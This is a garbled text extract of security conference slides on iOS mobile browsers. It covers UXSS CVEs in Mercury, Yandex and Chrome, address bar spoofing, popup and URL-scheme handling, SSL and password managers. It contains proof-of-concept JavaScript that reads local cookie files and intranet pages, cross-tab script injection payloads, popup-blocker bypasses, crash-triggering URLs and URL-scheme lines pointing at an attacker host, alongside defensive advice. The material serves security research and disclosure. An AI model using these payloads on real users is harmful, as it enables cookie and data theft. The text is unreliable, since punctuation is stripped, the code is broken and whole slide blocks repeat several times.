bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
